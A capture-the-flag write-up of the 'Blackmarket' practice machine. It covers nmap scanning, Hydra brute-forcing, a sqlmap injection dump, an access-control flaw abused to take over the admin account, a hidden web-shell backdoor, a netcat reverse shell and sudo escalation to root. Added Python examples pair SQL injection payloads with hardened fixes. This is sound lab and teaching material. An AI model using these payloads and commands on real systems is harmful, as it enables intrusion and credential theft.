Blackmarket One – Writeup


This machine is,149/

Recon Phase

First I needed to find out what IP address the target was running on, so I fired up Nmap with a ping sweep (-sn) of the local subnet to work it out

root@kali:~# nmap -sn
Nmap scan report for
Host is up (0.00027s latency).
MAC Address: 0A:00:27:00:00:00 (Unknown)
Nmap scan report for
Host is up (0.000096s latency).
MAC Address: 08:00:27:89:83:11 (Oracle VirtualBox virtual NIC)
Nmap scan report for
Host is up (0.00032s latency).
MAC Address: 08:00:27:24:52:72 (Oracle VirtualBox virtual NIC)
Nmap scan report for
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.05 seconds

Next I needed an idea of what services were running on the server to find potential entry points, so I pointed Nmap at it again, this time with version detection (-sV)

root@kali:~# nmap -sV
Nmap scan report for
Host is up (0.00056s latency).
Not shown: 993 filtered ports
21/tcp  open  ftp      vsftpd 3.0.2
22/tcp  open  ssh      OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http     Apache httpd 2.4.7 ((Ubuntu))
110/tcp open  pop3     Dovecot pop3d
143/tcp open  imap     Dovecot imapd (Ubuntu)
993/tcp open  ssl/imap Dovecot imapd (Ubuntu)
995/tcp open  ssl/pop3 Dovecot pop3d
MAC Address: 08:00:27:24:52:72 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Flag Hunting

So next it was time to start hunting for flags. The first thing I did was navigate to in browser

Screenshot 1

The first thing I saw was a login page, so I decided to poke around in the HTML source

Screenshot 2

So that's the first flag,


Part of the flag looks like base64, so I went ahead and decoded it

Q0lBIC0gT3BlcmF0aW9uIFRyZWFkc3RvbmU= : CIA - Operation Treadstone

I googled this and it seemed to be a reference to Jason Bourne, but I wasn't sure how that could help me yet, so I decided it was time to point DirBuster at the site

Screenshot 3

Once it finished I inspected the results

Screenshot 4

For a while I dug through these files looking for anything useful, but nothing stood out. Next I decided to build a wordlist around Jason Bourne and Operation Treadstone. Using CeWL (depth 0, minimum word length 5) I generated a wordlist to use

root@kali:~# cewl -d 0 -m 5 -w bourne.txt

I tried these as usernames with rockyou.txt as the password list in Hydra against SSH and FTP, but found no valid credentials

root@kali:~# hydra -L bourne.txt -P /usr/share/wordlists/rockyou.txt ssh
root@kali:~# hydra -L bourne.txt -P /usr/share/wordlists/rockyou.txt ftp

So after messing around for a while, I decided to put the words from the flags into a wordlist and use that as the password list instead

root@kali:~# hydra -L bourne.txt -P flagWords.txt ssh
root@kali:~# hydra -L bourne.txt -P flagWords.txt ftp

This led to me getting FTP credentials of nicky:CIA

So I used these to access the FTP server

root@kali:~# ftp

When it asked for a username and password I used nicky:CIA and began to dig around

ftp> ls -la
500 Illegal PORT command.

The server was refusing the active-mode PORT command (the client defaults to active mode, which needs the server to connect back to me), so I switched the client to passive mode and started digging

ftp> pass
ftp> ls -la
dr-xr-xr-x    4 1002     1002         4096 Nov 06  2017 .
dr-xr-xr-x    4 1002     1002         4096 Nov 06  2017 ..
-rw-r--r--    1 1002     1002          220 Nov 06  2017 .bash_logout
-rw-r--r--    1 1002     1002         3637 Nov 06  2017 .bashrc
drwx------    2 1002     1002         4096 Nov 06  2017 .cache
-rw-r--r--    1 1002     1002          675 Nov 06  2017 .profile
dr-xr-xr-x    3 65534    65534        4096 Nov 06  2017 ftp

A folder called "ftp"; I decided to look inside and see what I could find

ftp> cd ftp
ftp> ls -la
dr-xr-xr-x    3 65534    65534        4096 Nov 06  2017 .
dr-xr-xr-x    4 1002     1002         4096 Nov 06  2017 ..
drwxr-xr-x    2 1002     1002         4096 Nov 09  2017 ImpFiles

Another directory, so next I went into that

ftp> cd ImpFiles
ftp> ls -la
drwxr-xr-x    2 1002     1002         4096 Nov 09  2017 .
dr-xr-xr-x    3 65534    65534        4096 Nov 06  2017 ..
-rw-r--r--    1 0        0             216 Nov 12  2017 IMP.txt

As there was only a .txt file, I decided to download it and see what was in it

ftp> get IMP.txt

Now I had the file, I closed my FTP connection and took a look at what was in it

root@kali:~# cat IMP.txt
If anyone reading this message it means you are on the right track however I do not have any idea about the CIA blackmarket Vehical workshop. You must find out and hack it!

Now I had flag 2, so I decoded it

Q29uZ3JhdHMgUHJvY2VlZCBGdXJ0aGVy : Congrats Proceed Further

No helpful hint in this one; the message in IMP.txt was my next clue. "You must find out and hack it!" made me consider a hidden URL that DirBuster had failed to find before, so I put together a new wordlist of vehicle workshop related terms


I then fed these into DirBuster and waited for it to finish

Screenshot 5

DirBuster found a new directory at /vworkshop, so I navigated to it in the browser

Screenshot 6

I decided to try nicky:CIA on the various login screens available, first on the employee login

Screenshot 7

And then on customer

Screenshot 8

But neither of them worked, so I took a look around the pages available and found the spare parts store; nothing obviously useful yet.

Screenshot 9

Next I attempted to use the employee registration form to create my own account

Screenshot 10

And surprisingly, it worked

Screenshot 11

So I then tried to log in with those creds

Screenshot 12

After looking around for a while I wasn't able to find much, so I did this again, this time creating a user account

Screenshot 13

Screenshot 14

Screenshot 15

So I took a look around here and saw that selling a vehicle has a file upload option, so I attempted to upload /usr/share/webshells/php/simple-backdoor.php

Screenshot 16

And when I submitted it

Screenshot 17

But unfortunately I was then unable to trigger the shell. So I spent a while playing around as both the user account and the admin account, until I noticed something interesting on the spare part details page: the URL contains a parameter, ?sparepartid=[number], that looks like it is used directly as a database key. I decided to fire up sqlmap to see if this was injectable

root@kali:~# sqlmap -u

Screenshot 18

So it was injectable, and I now wanted to dump the whole database

root@kali:~# sqlmap -u --all
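What sqlmap is exploiting in the ?sparepartid= parameter, as an added example that is not code from the target or the original writeup: a lookup that concatenates the request value into the query, beside the hardened form that validates and binds it. The schema and hashes are a constructed, in-memory sqlite3 stand-in for the BlackMarket tables seen in the dump (the real box is PHP/MySQL), and the two payloads are hand-written examples of the boolean and UNION techniques sqlmap automates.

```python
import sqlite3

# Constructed in-memory stand-in for the BlackMarket schema seen in the sqlmap
# dump (hashes copied from the dump; the real target was PHP/MySQL, sqlite3
# is used here so the example runs offline).
SCHEMA = """
CREATE TABLE sparepart (sparepartid INTEGER PRIMARY KEY, name TEXT, price INTEGER);
CREATE TABLE user (userid INTEGER PRIMARY KEY, access INTEGER, username TEXT, password TEXT);
INSERT INTO sparepart VALUES (1, 'Brake pad', 40), (2, 'Oil filter', 12), (3, 'Spark plug', 8);
INSERT INTO user VALUES
  (1, 1, 'admin',    'cf18233438b9e88937ea0176f1311885'),
  (4, 3, 'supplier', '99b0e8da24e29e4ccb5d7d76e677c2ac');
"""


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, sparepartid):
    """Models the flaw: the raw ?sparepartid= value is concatenated into the SQL."""
    query = ("SELECT sparepartid, name, price FROM sparepart "
             "WHERE sparepartid = " + sparepartid)
    return conn.execute(query).fetchall()


def safe_lookup(conn, sparepartid):
    """Hardened form: reject anything that is not an integer, then bind the value
    as a parameter so it can never be parsed as SQL."""
    try:
        sid = int(sparepartid)
    except (TypeError, ValueError):
        return []
    return conn.execute(
        "SELECT sparepartid, name, price FROM sparepart WHERE sparepartid = ?",
        (sid,),
    ).fetchall()


# Hypothetical payloads of the kind sqlmap sends automatically.
BOOLEAN_PAYLOAD = "1 OR 1=1"                                             # every row comes back
UNION_PAYLOAD = "0 UNION SELECT userid, username, password FROM user"    # cross-table read, 3 columns to match


if __name__ == "__main__":
    db = open_db()
    print(vulnerable_lookup(db, BOOLEAN_PAYLOAD))   # all three spare parts
    print(vulnerable_lookup(db, UNION_PAYLOAD))     # admin and supplier hashes leak
    print(safe_lookup(db, BOOLEAN_PAYLOAD))         # []
```

The UNION payload has to supply the same number of columns as the original SELECT, which is why sqlmap spends its first requests counting columns before it dumps anything.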

This took a while, so I went and made a cup of tea. I also said yes to most of the prompts sqlmap presented during the run. Eventually it finished and I had various bits of information. First there was a table called "flag"

Database: BlackMarket
Table: flag
[1 entry]
| FlagId | name | Information                    |
| 3      | Flag | Find Jason Bourne Email access |

So I now had flag 3 and my next hint. For this, there were 2 seemingly relevant tables

Database: BlackMarket
Table: user
[5 entries]
| userid | access | username | password                                    |
| 1      | 1      | admin    | cf18233438b9e88937ea0176f1311885            |
| 2      | 2      | user     | 0d8d5cd06832b29560745fe4e1b941cf            |
| 4      | 3      | supplier | 99b0e8da24e29e4ccb5d7d76e677c2ac (supplier) |
| 5      | 2      | jbourne  | 28267a2e06e312aee91324e2fe8ef1fd            |
| 6      | 3      | bladen   | cbb8d2a0335c793532f9ad516987a41c            |
Database: BlackMarket
Table: customer
[2 entries]
| userid | contact               | address       | customer_name   |
| 2      |  | Moscow Russia | Dimitri Volkof  |
| 5      |       | Texas         | Jason Bourne    |

So sqlmap was able to crack the password hash for supplier: it was supplier:supplier. I headed back to the original login page and used those creds to log in

Screenshot 19

There didn't seem to be much of use here, so I tried the /admin URL we found earlier

Screenshot 20

While looking around this section I came across a page called Users, with options to edit them. I decided to try changing jbourne's password


The first thing I noted was that when I submitted this request I was sent to /admin/edit_customer.php?id=5. We already know admin is user id 1, so we might be able to change admin's details the same way we changed jbourne's. But first I logged out and tried to log in as jbourne

Screenshot 22

Well, the contents had changed, but I didn't seem to have any new avenues of attack, so I went back to the idea of changing admin's password. To start, I changed jbourne's password again, but this time inspected the request

Screenshot 23

I copied this as a curl command, but changed the endpoint to /admin/edit_customer.php?id=1 so it would update id 1 instead

root@kali:~# curl '' -H 'Host:' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer:' -H 'Cookie: PHPSESSID=ma5rgn6ctacf5j5iib6ds79ql3' -H 'Connection: keep-alive' -H 'Upgrade-Insecure-Requests: 1' --data 'name=Jason+Bourne&address=Texas+&'
window.alert('Customer updated successfully!');

It looked like it worked, so I logged out and tried to log in with admin:pass, but it failed. I then tried jbourne:pass again and it turned out I had overwritten admin's username as well as the password: the endpoint updated whichever id was in the URL with every field I posted, and never checked that a supplier-level account should be editing anything at all
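The two missing controls behind that result, as an added example that is not code from the target or the writeup: an edit handler that trusts the id in the query string and writes every posted field, beside a hardened version that checks the caller's access level from the session and only writes an allow-list of fields. The user rows are a constructed copy of the dump above (hashes shortened), the admin-only rule and the field allow-list are assumptions about how the real application should behave, and `run_request` simply replays one request against a fresh copy of the table.

```python
import copy

# Constructed copy of rows from the user table in the sqlmap dump (hashes shortened).
USERS = {
    1: {"access": 1, "username": "admin",    "password": "cf18...1885"},
    4: {"access": 3, "username": "supplier", "password": "99b0...c2ac"},
    5: {"access": 2, "username": "jbourne",  "password": "2826...f1fd"},
}
ADMIN_ACCESS = 1   # assumption: access level 1 is the administrator

# The form fields replayed in the curl request on the page (username/password
# values are what the page reports ended up in admin's row).
REPLAYED_FORM = {"username": "jbourne", "password": "pass",
                 "name": "Jason Bourne", "address": "Texas"}


class Forbidden(Exception):
    pass


def edit_customer_vulnerable(users, session, target_id, form):
    """Models /admin/edit_customer.php?id=N as observed: the id comes from the
    query string, nobody checks who is asking, and every posted field is written."""
    users[target_id].update(form)
    return "Customer updated successfully!"


def edit_customer_hardened(users, session, target_id, form):
    """Same operation with the two missing controls (hypothetical fix):
    1. the caller must hold admin access, read server-side from the session;
    2. only an allow-list of fields is written, so username can't be clobbered."""
    actor = users.get(session.get("userid"))
    if actor is None or actor["access"] != ADMIN_ACCESS:
        raise Forbidden("admin access required")
    allowed = {"password", "name", "address"}
    unexpected = set(form) - allowed
    if unexpected:
        raise ValueError(f"field(s) not editable here: {sorted(unexpected)}")
    if target_id not in users:
        raise KeyError(target_id)
    users[target_id].update(form)
    return "Customer updated successfully!"


def run_request(handler, session_userid, target_id, form):
    """Run one request against a fresh copy of the table. Returns (result, users),
    where result is the handler's message or the name of the exception raised."""
    users = copy.deepcopy(USERS)
    try:
        result = handler(users, {"userid": session_userid}, target_id, form)
    except (Forbidden, ValueError, KeyError) as exc:
        result = type(exc).__name__
    return result, users


if __name__ == "__main__":
    # supplier (userid 4) replays the page's request against id=1
    print(run_request(edit_customer_vulnerable, 4, 1, REPLAYED_FORM)[1][1])  # admin row renamed to jbourne
    print(run_request(edit_customer_hardened, 4, 1, REPLAYED_FORM)[0])       # Forbidden
```

Note that an authorization check on /admin alone would not have been enough: a genuine admin posting this form would still have silently renamed the account, which is why the field allow-list is the second half of the fix.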

Screenshot 24

And that's flag 4, flag4{bm90aGluZyBpcyBoZXJl}; as with the previous ones I decoded the base64

bm90aGluZyBpcyBoZXJl : nothing is here

Once I clicked OK I was forwarded back to the site, but couldn't find anything new. As a lot of the previous parts had been helped by the flag, I decided to focus on "Jason Bourne Email access ?????". My first thought was that this could indicate the password was 5 characters long, and I was getting ready to take my wordlists from earlier and filter them for strings of length 5. But before I did this, I headed over to /squirrelmail


Before messing around with wordlists, I decided to just try the literal ????? as the password and logged in with jbourne:?????

Screenshot 26

There was an email from Putin, so I opened it up to take a look

Screenshot 27

Now I had the 5th flag, Flag5{RXZlcnl0aGluZyBpcyBlbmNyeXB0ZWQ=}, which I decoded straight away

RXZlcnl0aGluZyBpcyBlbmNyeXB0ZWQ= : Everything is encrypted

Now I had to spend a while investigating encryption methods that could have been used on the message, until I eventually came across the simple substitution cipher. Using the reversed alphabet (z...a) as the key, which is the Atbash cipher, gave a readable result

Hi Dimitri If you are reading this I might be not alive. I have place a backdoor in Blackmarket workshop under /kgbbackdoor folder you must have to use PassPass.jpg in order to get access.

First I attempted to access the folder but received a 403, which was a good sign: it indicated the directory existed but directory listing was denied, so I would have to guess filenames. I started with

Screenshot 31

The message had indicated this file would be useful, so I downloaded it to inspect with various tools

root@kali:~# file PassPass.jpg
PassPass.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 900x506, frames 3
root@kali:~# binwalk PassPass.jpg
0             0x0             JPEG image data, JFIF standard 1.01
root@kali:~# strings PassPass.jpg
Pass = 5215565757312090656

I've trimmed the strings output here as it was rather long, but what I found was a potential password. Next up was finding the backdoor itself. I started guessing URLs, hitting multiple 404 errors

Screenshot 28

Until eventually I tried /backdoor.php and was presented with what looked like a 404, but it was different from the previous 404 pages

Screenshot 29

The version numbers didn't match, among other differences, so I inspected the HTML source

Screenshot 30

This is when I realised it was a fake error page, and probably the backdoor I had been looking for. In the hidden password field I tried the value from PassPass.jpg, 5215565757312090656, but that didn't work. I then thought back to the flag clue "Everything is encrypted"; maybe that included the password. Converting the decimal number to hex gives 4861696C4B474220, which didn't work as a password either, but reading those eight bytes as ASCII gives "HailKGB" (the final byte, 0x20, is a trailing space), which certainly seemed appropriate. When I tried it as the password, it was clear I had now accessed the backdoor
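The three decoding steps used on this box (the Atbash substitution on Putin's email, the decimal to ASCII conversion of the PassPass.jpg value, and the base64 inside every flag), as an added example that is not code from the writeup. The Atbash ciphertext is not reproduced on the page, so the block constructs it from the recovered plaintext and checks the round trip; since Atbash is its own inverse, the same function encrypts and decrypts.

```python
import base64
import string

# Atbash: the alphabet mapped onto itself reversed (a<->z, b<->y, ...).
_LOWER, _UPPER = string.ascii_lowercase, string.ascii_uppercase
_ATBASH = str.maketrans(_LOWER + _UPPER, _LOWER[::-1] + _UPPER[::-1])


def atbash(text):
    """Apply the Atbash substitution; digits, punctuation and '/' pass through
    unchanged, which is why paths like /kgbbackdoor survive the cipher."""
    return text.translate(_ATBASH)


def decimal_to_ascii(value):
    """Interpret a decimal integer as a big-endian byte string and decode it as
    ASCII. This is the 'hex, then ASCII' step from the PassPass.jpg clue in one go."""
    n = int(value)
    raw = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return raw.decode("ascii")


def decode_flag(flag):
    """flagN{<base64>} -> plaintext, the format of every flag on this box."""
    inner = flag[flag.index("{") + 1:flag.rindex("}")]
    return base64.b64decode(inner).decode("utf-8")


# Plaintext recovered on the page; its ciphertext is constructed here so the
# decode can be exercised offline.
PLAINTEXT = ("Hi Dimitri If you are reading this I might be not alive. I have place a "
             "backdoor in Blackmarket workshop under /kgbbackdoor folder you must have "
             "to use PassPass.jpg in order to get access.")
CIPHERTEXT = atbash(PLAINTEXT)


if __name__ == "__main__":
    print(CIPHERTEXT)
    print(atbash(CIPHERTEXT))
    print(repr(decimal_to_ascii("5215565757312090656")))   # 'HailKGB ' (note the space)
    print(decode_flag("flag6{Um9vdCB0aW1l}"))
```

The `repr` in the usage line is deliberate: the decoded password carries a trailing space that a plain print would hide, and it is exactly the kind of byte that makes a correct password "not work" until it is stripped.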

Screenshot 31

The first thing I did was open flag.txt and got flag6{Um9vdCB0aW1l}, which I then decoded.

Um9vdCB0aW1l : Root time

Root Time

I headed over to the Exec tab, where I found a web shell. First I just wanted to check it worked

$ whoami

Okay, so the shell works; now I was looking for a privilege escalation route. The first thing to do was get a list of users

$ cat /etc/passwd
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
mysql:x:102:106:MySQL Server,,,:/nonexistent:/bin/false
dovecot:x:106:114:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:107:115:Dovecot login user,,,:/nonexistent:/bin/false
libvirt-qemu:x:110:107:Libvirt Qemu,,,:/var/lib/libvirt:/bin/false
libvirt-dnsmasq:x:111:117:Libvirt Dnsmasq,,,:/var/lib/libvirt/dnsmasq:/bin/false
ftp:x:112:120:ftp daemon,,,:/srv/ftp:/bin/false

So there is a user called dimitri with a /bin/bash login shell, which looked like the best target for a user account. So I got digging

$ cd /home
$ ls -la
drwxr-xr-x  5 root    root    4096 Nov 16  2017 .
drwxr-xr-x 22 root    root    4096 Nov  1  2017 ..
drwxrwxr-x  2 dimitri dimitri 4096 Nov 16  2017 .Mylife
drwxr-xr-x  4 dimitri dimitri 4096 Nov 16  2017 dimitri
dr-xr-xr-x  4 nicky   nicky   4096 Nov  6  2017 nicky

The directory called .Mylife owned by dimitri instantly caught my attention as it looked out of place, so I investigated it further

$ cd .Mylife
$ ls -la
drwxrwxr-x 2 dimitri dimitri 4096 Nov 16  2017 .
drwxr-xr-x 5 root    root    4096 Nov 16  2017 ..
-rw-rw-r-- 1 dimitri dimitri  369 Nov 16  2017 .Secret

Well, a file called .Secret is always interesting, so I instantly wanted to read it

$ cat .Secret
I have been working on this CIA BlackMarket Project but it seems like I am not doing anything
right for people. Selling drugs and guns is not my business so soon I will quit the job.
About my personal life I am a sharp shooter have two kids but my wife don't like me and I am broke. Food wise I eat everything but DimitryHateApple
I will add more about later!

The phrase "DimitryHateApple" instantly stood out: it was in camel case, which makes no sense in normal prose, so I suspected it could be a password. I also noted that dimitri was spelt Dimitry here, which differs from the username I saw earlier. So I decided to try it as his password

$ su dimitri

But that gave nothing. I considered that there may have been an error that wasn't shown, so I tried again, this time redirecting stderr to stdout

$ su dimitri 2>&1
su: must be run from a terminal

At this point I was sick of using a web terminal, and on the Network tab I saw an option to spawn a reverse shell. So I opened another terminal on my Kali machine to receive it

root@kali:~# nc -lp 31337

And back on the Network tab of the backdoor I hit the back-connect button

/bin/sh: 0: can't access tty; job control turned off

At this point it became apparent I didn't have a full TTY, so I used the usual Python trick to spawn a nicer one

$ python -c "import pty;pty.spawn('/bin/bash')"

Now I had a better shell I tried to su to dimitri again using DimitryHateApple as the password

www-data@Dimitri:/$ su dimitri
su: Authentication failure

When this failed, I tried again with the spelling corrected to match the username, so I used DimitriHateApple as the password

www-data@Dimitri:/$ su dimitri

Now I had access as dimitri, I checked what I could do with sudo

dimitri@Dimitri:/$ sudo -l
Matching Defaults entries for dimitri on Dimitri:
  env_reset, mail_badpass,
User dimitri may run the following commands on Dimitri:

This was what I had been hoping for, as now all it took was

dimitri@Dimitri:/$ sudo su

With the machine rooted, all that was left to do was collect the final flag

root@Dimitri:/# cd /root
root@Dimitri:~# ls -la
drwx------  2 root root 4096 Nov 12  2017 .
drwxr-xr-x 22 root root 4096 Nov  1  2017 ..
-rw-------  1 root root  286 Nov 16  2017 .bash_history
-rw-r--r--  1 root root 3106 Feb 20  2014 .bashrc
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
-rw-r--r--  1 root root  705 Nov  9  2017 THEEND.txt
root@Dimitri:~# cat THEEND.txt

Screenshot 33

And that is the machine completed!
